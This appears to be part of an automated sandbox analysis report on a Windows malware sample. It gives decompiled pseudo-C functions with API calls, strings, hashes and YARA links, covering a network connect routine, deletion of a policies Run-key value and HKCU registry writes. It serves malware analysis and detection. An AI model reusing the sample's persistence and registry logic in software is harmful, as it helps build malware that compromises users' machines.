Opcode ID: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
Instruction ID: 7ac9442b92b71a3b95e557c57f242bac25566de69d818a97a3fadf0226cee174
Opcode Fuzzy Hash: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
Instruction Fuzzy Hash: 1801D670541218BFE7105F61AC89EFF777CDB45396F1001AAF805A3281D6748F019674

Uniqueness

Uniqueness Score: -1.00%

Function 00404A08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
networkCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00404A08(void* __edx, char _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t12;
				signed int _t15;
				void* _t16;
				void* _t22;
				void* _t23;
				signed int _t25;
				void* _t31;
				char* _t32;
				void* _t33;

				_t22 = _t23;
				_t32 =  &_a4;
				_t12 = _t22 + 8;
				_t31 = _t12;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd"); // executed
				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10); // executed
				if(_t12 != 0) {
					L5:
					return 0;
				}
				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
					L9:
					return 1;
				}
				_t15 = E0041C71E(_t22, _t23); // executed
				 *(_t22 + 0x44) = _t15;
				if(_t15 == 0) {
					goto L5;
				}
				_t30 =  *((intOrPtr*)(_t22 + 4));
				_t16 = E0041C76C(_t15,  *((intOrPtr*)(_t22 + 4)));
				_t25 =  *(_t22 + 0x44);
				if(_t16 == 1) {
					if(E0041D1ED() == 1) {
						goto L9;
					}
					_t34 = _t33 - 0x18;
					E00402084(_t22, _t33 - 0x18, "TLS Authentication failed");
					E00402084(_t22, _t34 - 0x18, "[ERROR]");
					_t16 = E0041C8E7(L00416C80(_t22, _t31),  *(_t22 + 0x44));
					_t25 =  *(_t22 + 0x44);
				}
				E0041C763(_t16, _t22, _t25, _t30, _t31, _t32);
				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
				goto L5;
			}

0x00404a0f
0x00404a11
0x00404a16
0x00404a19
0x00404a1f
0x00404a20
0x00404a21
0x00404a22
0x00404a23
0x00404a2b
0x00404a59
0x00000000
0x00404a59
0x00404a30
0x00404aa0
0x00000000
0x00404aa0
0x00404a32
0x00404a37
0x00404a3c
0x00000000
0x00000000
0x00404a3e
0x00404a43
0x00404a48
0x00404a4e
0x00404a6b
0x00000000
0x00000000
0x00404a6d
0x00404a77
0x00404a86
0x00404a96
0x00404a9b
0x00404a9b
0x00404a50
0x00404a55
0x00000000

APIs

connect.WS2_32(?,?,00000010), ref: 00404A23

Strings

[ERROR], xrefs: 00404A81
TLS Authentication failed, xrefs: 00404A72

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: connect
String ID: TLS Authentication failed$[ERROR]
API String ID: 1959786783-1964023390
Opcode ID: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
Opcode Fuzzy Hash: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00410D5C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00410D5C(void* __ecx, short* __edx, short* _a4) {
				void* _v8;
				long _t5;
				signed int _t6;

				_push(__ecx);
				_t5 = RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8); // executed
				if(_t5 == 0) {
					_t6 = RegDeleteValueW(_v8, _a4); // executed
					asm("sbb al, al");
					return  ~_t6 + 1;
				}
				return 0;
			}

0x00410d5f
0x00410d6a
0x00410d72
0x00410d7e
0x00410d86
0x00000000
0x00410d88
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046C500,80000002,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D6A
RegDeleteValueW.KERNELBASE(0046C500,0046C518,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D7E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410D68

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
Instruction ID: 75ebaf3219d9d67017fe3971026eac3f4578a9a4a068ccc2e26b180b3f179870
Opcode Fuzzy Hash: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
Instruction Fuzzy Hash: D1E0C231284308BBEF104FB1EC07FFA772CEB01F42F1002A5B90692091C666DB549664

Uniqueness

Uniqueness Score: -1.00%

Function 0043D08E, Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0043D08E(void* __ebx, char* _a4) {
				signed short* _v0;
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed short* _v40;
				intOrPtr _v56;
				intOrPtr* _v84;
				void* __ecx;
				char _t32;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr _t40;
				void* _t42;
				signed int _t46;
				signed short _t51;
				signed int _t52;
				void* _t55;
				void* _t57;
				intOrPtr _t58;
				intOrPtr* _t60;
				signed short _t63;
				intOrPtr* _t64;
				void* _t68;
				intOrPtr* _t69;
				signed short* _t71;
				void* _t73;
				intOrPtr* _t75;
				intOrPtr* _t79;
				signed short* _t88;
				signed int _t90;
				void* _t91;
				signed short* _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t104;
				signed short* _t105;
				char* _t107;
				intOrPtr _t109;
				intOrPtr* _t111;
				signed short* _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				signed short* _t119;
				intOrPtr _t120;
				intOrPtr _t122;
				intOrPtr* _t123;
				void* _t127;
				void* _t129;

				_push(_t74);
				_push(_t74);
				_t107 = _a4;
				_t102 = 0;
				_t115 = _t107;
				_t32 =  *_t107;
				while(_t32 != 0) {
					if(_t32 != 0x3d) {
						_t102 = _t102 + 1;
					}
					_t75 = _t115;
					_t68 = _t75 + 1;
					do {
						_t33 =  *_t75;
						_t75 = _t75 + 1;
					} while (_t33 != 0);
					_t74 = _t75 - _t68;
					_t115 = _t115 + 1 + _t75 - _t68;
					_t32 =  *_t115;
				}
				_t3 = _t102 + 1; // 0x1
				_t69 = E0043F348(_t74, _t3, 4);
				if(_t69 == 0) {
					L19:
					_t69 = 0;
					goto L20;
				} else {
					_v8 = _t69;
					while( *_t107 != 0) {
						_t79 = _t107;
						_t103 = _t79 + 1;
						do {
							_t38 =  *_t79;
							_t79 = _t79 + 1;
						} while (_t38 != 0);
						_t80 = _t79 - _t103;
						_t39 = _t79 - _t103 + 1;
						_v12 = _t39;
						if( *_t107 == 0x3d) {
							L15:
							_t107 = _t107 + _t39;
							continue;
						} else {
							_t40 = E0043F348(_t80, _t39, 1); // executed
							_t118 = _t40;
							_pop(_t82);
							if(_t118 == 0) {
								_push(_t69);
								L45();
								E004401F5(0);
								goto L19;
							} else {
								_t42 = E00441916(_t118, _v12, _t107);
								_t129 = _t129 + 0xc;
								if(_t42 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E0043698A();
									asm("int3");
									_t127 = _t129;
									_push(_t82);
									_push(_t82);
									_push(_t69);
									_t71 = _v40;
									_v56 = 0;
									_t104 = 0;
									_push(_t118);
									_push(_t107);
									_t46 =  *_t71 & 0x0000ffff;
									_t119 = _t71;
									if(_t46 != 0) {
										_t73 = 0x3d;
										do {
											if(_t46 != _t73) {
												_t104 = _t104 + 1;
											}
											_t99 = _t119;
											_t14 =  &(_t99[1]); // 0x2
											_t113 = _t14;
											do {
												_t63 =  *_t99;
												_t99 =  &(_t99[1]);
											} while (_t63 != _v16);
											_t82 = _t99 - _t113 >> 1;
											_t119 =  &(( &(_t119[_t99 - _t113 >> 1]))[1]);
											_t46 =  *_t119 & 0x0000ffff;
										} while (_t46 != 0);
										_t71 = _v0;
									}
									_t19 = _t104 + 1; // 0x1
									_t109 = E0043F348(_t82, _t19, 4);
									_t120 = 0;
									if(_t109 == 0) {
										L42:
										_t109 = _t120;
										goto L43;
									} else {
										_v12 = _t109;
										while( *_t71 != _t120) {
											_t88 = _t71;
											_t21 =  &(_t88[1]); // 0x2
											_t105 = _t21;
											do {
												_t51 =  *_t88;
												_t88 =  &(_t88[1]);
											} while (_t51 != _t120);
											_t90 = _t88 - _t105 >> 1;
											_t22 = _t90 + 1; // -1
											_t52 = _t22;
											_t91 = 0x3d;
											_v16 = _t52;
											if( *_t71 == _t91) {
												L38:
												_t71 =  &(_t71[_t52]);
												continue;
											} else {
												_t122 = E0043F348(_t91, _t52, 2);
												if(_t122 == 0) {
													_push(_t109);
													L45();
													_t120 = 0;
													E004401F5(0);
													goto L42;
												} else {
													_t55 = E004415D4(_t122, _v16, _t71);
													_t129 = _t129 + 0xc;
													if(_t55 != 0) {
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_t57 = E0043698A();
														asm("int3");
														_push(_t127);
														_push(_t122);
														_t123 = _v84;
														if(_t123 != 0) {
															_t58 =  *_t123;
															_push(_t109);
															_t111 = _t123;
															while(_t58 != 0) {
																E004401F5(_t58);
																_t111 = _t111 + 4;
																_t58 =  *_t111;
															}
															_t57 = E004401F5(_t123);
														}
														return _t57;
													} else {
														_t60 = _v12;
														 *_t60 = _t122;
														_t120 = 0;
														_v12 = _t60 + 4;
														E004401F5(0);
														_t52 = _v16;
														goto L38;
													}
												}
											}
											goto L51;
										}
										L43:
										E004401F5(_t120);
										return _t109;
									}
								} else {
									_t64 = _v8;
									 *_t64 = _t118;
									_v8 = _t64 + 4;
									E004401F5(0);
									_t39 = _v12;
									goto L15;
								}
							}
						}
						goto L51;
					}
					L20:
					E004401F5(0);
					return _t69;
				}
				L51:
			}

0x0043d093
0x0043d094
0x0043d098
0x0043d09b
0x0043d09d
0x0043d09f
0x0043d0bb
0x0043d0a5
0x0043d0a7
0x0043d0a7
0x0043d0a8
0x0043d0aa
0x0043d0ad
0x0043d0ad
0x0043d0af
0x0043d0b0
0x0043d0b4
0x0043d0b7
0x0043d0b9
0x0043d0b9
0x0043d0bf
0x0043d0ca
0x0043d0d0
0x0043d13f
0x0043d13f
0x00000000
0x0043d0d2
0x0043d0d2
0x0043d129
0x0043d0d7
0x0043d0d9
0x0043d0dc
0x0043d0dc
0x0043d0de
0x0043d0df
0x0043d0e3
0x0043d0e8
0x0043d0eb
0x0043d0ee
0x0043d127
0x0043d127
0x00000000
0x0043d0f0
0x0043d0f3
0x0043d0f8
0x0043d0fb
0x0043d0fe
0x0043d130
0x0043d131
0x0043d138
0x00000000
0x0043d100
0x0043d105
0x0043d10a
0x0043d10f
0x0043d154
0x0043d155
0x0043d156
0x0043d157
0x0043d158
0x0043d159
0x0043d15e
0x0043d162
0x0043d164
0x0043d165
0x0043d166
0x0043d167
0x0043d16c
0x0043d16f
0x0043d171
0x0043d172
0x0043d173
0x0043d176
0x0043d17b
0x0043d17f
0x0043d180
0x0043d183
0x0043d185
0x0043d185
0x0043d186
0x0043d188
0x0043d188
0x0043d18b
0x0043d18b
0x0043d18e
0x0043d191
0x0043d199
0x0043d19e
0x0043d1a1
0x0043d1a4
0x0043d1a9
0x0043d1a9
0x0043d1ac
0x0043d1b7
0x0043d1b9
0x0043d1bf
0x0043d23a
0x0043d23a
0x00000000
0x0043d1c1
0x0043d1c1
0x0043d223
0x0043d1c6
0x0043d1c8
0x0043d1c8
0x0043d1cb
0x0043d1cb
0x0043d1ce
0x0043d1d1
0x0043d1d8
0x0043d1dc
0x0043d1dc
0x0043d1df
0x0043d1e0
0x0043d1e6
0x0043d220
0x0043d220
0x00000000
0x0043d1e8
0x0043d1f0
0x0043d1f6
0x0043d22a
0x0043d22b
0x0043d230
0x0043d233
0x00000000
0x0043d1f8
0x0043d1fd
0x0043d202
0x0043d207
0x0043d24e
0x0043d24f
0x0043d250
0x0043d251
0x0043d252
0x0043d253
0x0043d258
0x0043d25b
0x0043d25e
0x0043d25f
0x0043d264
0x0043d266
0x0043d268
0x0043d269
0x0043d279
0x0043d26e
0x0043d273
0x0043d276
0x0043d278
0x0043d27e
0x0043d284
0x0043d287
0x0043d209
0x0043d209
0x0043d20c
0x0043d20e
0x0043d214
0x0043d217
0x0043d21c
0x00000000
0x0043d21f
0x0043d207
0x0043d1f6
0x00000000
0x0043d1e6
0x0043d23c
0x0043d23d
0x0043d24b
0x0043d24b
0x0043d111
0x0043d111
0x0043d116
0x0043d11b
0x0043d11e
0x0043d123
0x00000000
0x0043d126
0x0043d10f
0x0043d0fe
0x00000000
0x0043d0ee
0x0043d141
0x0043d143
0x0043d151
0x0043d151
0x00000000

APIs

_free.LIBCMT ref: 0043D11E
_free.LIBCMT ref: 0043D138
_free.LIBCMT ref: 0043D143

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9a51304947bdeac4f785d24115895ac5f8fb604f01fe01d282d8125f660c871f
Instruction ID: 9d16ed82f1cf384b794d9c5acb04068b2f478c67ac69ff16474b750f7c3d3988
Opcode Fuzzy Hash: 9a51304947bdeac4f785d24115895ac5f8fb604f01fe01d282d8125f660c871f
Instruction Fuzzy Hash: 48216E72D082416BEF189E79A8417AAB7B9CF4A328F24115FE94557241DA7A4D038358

Uniqueness

Uniqueness Score: -1.00%

Function 00410A30, Relevance: 4.5, APIs: 3, Instructions: 42
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410A30(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v12;
				char _v1040;
				long _t14;
				long _t17;

				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12); // executed
				if(_t14 != 0) {
					L3:
					return 0;
				}
				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12); // executed
				RegCloseKey(_v12); // executed
				if(_t17 != 0) {
					goto L3;
				}
				E00405A7C( &_v1040, _a16, _a20);
				E00405B03( &_v1040, _a8, _a12);
				return 1;
			}

0x00410a4c
0x00410a54
0x00410aa0
0x00000000
0x00410aa0
0x00410a65
0x00410a70
0x00410a78
0x00000000
0x00000000
0x00410a86
0x00410a97
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
RegCloseKey.KERNELBASE(00000000), ref: 00410A70

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
Instruction ID: 441e9820231bba63bf934a94159cc2a1568a4eaa66ed414e7fe82764e71c2100
Opcode Fuzzy Hash: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
Instruction Fuzzy Hash: E5014B3180022DFBCF219FA1DC49DEB7F38EF157A1F004165BA08621A1D6759AA5DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410AA7, Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00410AA7(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = E00402489();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, L00401F95( &_a8), _t15); // executed
					RegCloseKey(_v8);
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				E00401FC7();
				return _t20;
			}

0x00410aaa
0x00410aab
0x00410ab6
0x00410abe
0x00410af7
0x00410ac0
0x00410ac4
0x00410ade
0x00410ae9
0x00410af2
0x00410af2
0x00410afc
0x00410b07

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94

Uniqueness

Uniqueness Score: -1.00%

Function 004108E2, Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E004108E2(void* __ecx, void* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				char _v1036;
				long _t11;
				void* _t19;
				void* _t23;

				_v12 = 0x400;
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_push(0x45f6bc);
				} else {
					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
					RegCloseKey(_v8);
					_push( &_v1036);
				}
				E00402084(_t19, _t23);
				return _t23;
			}

0x004108ef
0x00410901
0x00410904
0x0041090c
0x0041093b
0x0041090e
0x00410923
0x0041092c
0x00410938
0x00410938
0x00410942
0x0041094d

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
RegCloseKey.ADVAPI32(00000000), ref: 0041092C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00410885, Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410885(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;
			}

0x0041088d
0x0041088e
0x00410891
0x004108a5
0x004108ad
0x00000000
0x004108dc
0x004108c3
0x004108ce
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
RegCloseKey.KERNELBASE(?), ref: 004108CE

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041432B, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041432B(WCHAR* __ecx) {
				void* _v16;
				char _v20;
				void* _t5;
				char _t12;

				_t1 =  &_v20; // 0x405f20
				_t5 = E0041412B(__ecx, _t12, _t1); // executed
				_t2 =  &_v20; // 0x405f20
				CloseHandle( *_t2);
				CloseHandle(_v16);
				return _t5;
			}

0x00414331
0x00414336
0x0041433c
0x00414341
0x0041434a
0x00414356

APIs

CloseHandle.KERNEL32( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
CloseHandle.KERNEL32(?), ref: 0041434A

Strings

_@, xrefs: 00414331, 0041433C, 00414335

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle
String ID: _@
API String ID: 2962429428-2364776441
Opcode ID: 58aded64bf1e59f1414464173308a418173fcc3aae8707c786a46d3112efcba5
Instruction ID: 593f2f721d058f847ab3d215af488efc5a805750498aadbe0de6bb03fde21c1b
Opcode Fuzzy Hash: 58aded64bf1e59f1414464173308a418173fcc3aae8707c786a46d3112efcba5
Instruction Fuzzy Hash: 7FD05E35C4221C7F8F007FA4AC0A8ADB77CFA09202B540596F828822129A7699548A64

Uniqueness

Uniqueness Score: -1.00%

Function 00416ED0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416ED0(intOrPtr* __ecx) {
				struct _MEMORYSTATUSEX _v68;
				intOrPtr _t8;

				_v68.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v68); // executed
				 *__ecx = _v68.ullTotalPhys;
				_t8 = _v68.ullAvailPhys;
				 *((intOrPtr*)(__ecx + 4)) = _t8;
				return _t8;
			}

0x00416eda
0x00416ee4
0x00416eed
0x00416eef
0x00416ef2
0x00416ef9

APIs

GlobalMemoryStatusEx.KERNELBASE(?,00000001), ref: 00416EE4

Strings

@, xrefs: 00416EDA

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: ce4d863d7768f255fddeabf47dc1dbfb58c639174398680716ba09d3759aad2e
Instruction ID: 6e419d6119f7d5a92ba7ea5aa2db3d9dcc0ca085608ff36f3d6b7b397ab9513c
Opcode Fuzzy Hash: ce4d863d7768f255fddeabf47dc1dbfb58c639174398680716ba09d3759aad2e
Instruction Fuzzy Hash: 3ED017B580231C9FC720EFA8E804A8DBBFCFB08210F00056AEC49E3300E770A8108B95

Uniqueness

Uniqueness Score: -1.00%

Function 0043F9DA, Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0043F9DA(void* __ecx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				long _t15;

				_t10 = __ecx;
				_t13 = _a4;
				if(_t13 != 0) {
					_t15 = _a8;
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _t15 - 0xffffffe0;
						if(_t15 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0x46ba48, 0, _t13, _t15);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = L0043ED9A();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E0043C819(_t10, _t15, __eflags, _t15);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E0043A504())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E004401F5(_t13);
					goto L6;
				}
				_t9 = E0043F98C(__ecx, _a8); // executed
				return _t9;
			}

0x0043f9da
0x0043f9e0
0x0043f9e5
0x0043f9f3
0x0043f9f6
0x0043f9f8
0x0043fa03
0x0043fa06
0x0043fa2d
0x0043fa37
0x0043fa3d
0x0043fa3f
0x00000000
0x00000000
0x0043fa1e
0x0043fa20
0x00000000
0x00000000
0x0043fa23
0x0043fa28
0x0043fa29
0x0043fa2b
0x00000000
0x00000000
0x0043fa2b
0x0043fa15
0x00000000
0x0043fa15
0x0043fa08
0x0043fa0d
0x0043fa13
0x0043fa13
0x0043fa13
0x00000000
0x0043fa13
0x0043f9fb
0x00000000
0x0043fa00
0x0043f9ea
0x00000000

APIs

_free.LIBCMT ref: 0043F9FB

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

HeapReAlloc.KERNEL32(00000000,?,00000001,00000000,00000001,?,0040F572,?,?,?,0040F89B), ref: 0043FA37

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 4ca8d7ab3290d2eb1fd3303bc8f711b70a5148a9605fb1f49f879c97dc32b84b
Instruction ID: 409074293b3810aa7ddd1280863e7d0579cbe773a19cb3134e1aa8b6ea316b44
Opcode Fuzzy Hash: 4ca8d7ab3290d2eb1fd3303bc8f711b70a5148a9605fb1f49f879c97dc32b84b
Instruction Fuzzy Hash: 08F0C832E0121275CB217A26BC00B5B27588FC9765F11613BF829A6291DE3CD80582AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401646, Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401646(signed int _a4, signed int _a8, char _a12) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __esi;
				signed int _t59;
				signed int _t60;
				signed int _t62;
				signed int _t71;
				intOrPtr _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				intOrPtr _t87;
				signed int _t88;
				signed int _t90;
				intOrPtr _t91;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr* _t100;
				signed int _t101;
				signed int _t102;
				signed int _t104;
				intOrPtr _t112;
				signed int _t120;
				intOrPtr* _t122;
				signed int _t123;
				signed int _t125;
				signed int _t126;
				void* _t127;
				void* _t133;
				void* _t134;
				void* _t136;
				void* _t137;

				_t101 = _a4;
				if(_t101 != 0) {
					_t60 = _t59 | 0xffffffff;
					_t120 = _t60 % _a8;
					__eflags = _t60 / _a8 - _t101;
					if(_t60 / _a8 >= _t101) {
						_t102 = _t101 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t62 = E0042F218(_t120, _t127, __eflags, _t102); // executed
							_t104 = _t62;
							goto L9;
						} else {
							__eflags = _t102 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t64 = _t102 + 0x23;
								__eflags = _t102 + 0x23 - _t102;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t91 = E0042F218(_t120, _t127, __eflags, _t64); // executed
									_t11 = _t91 + 0x23; // 0x23
									_t104 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t104 - 4)) = _t91;
									L9:
									return _t104;
								}
							}
						}
					} else {
						L3:
						_t133 = _t136;
						_t137 = _t136 - 0xc;
						E0042F92F( &_v20);
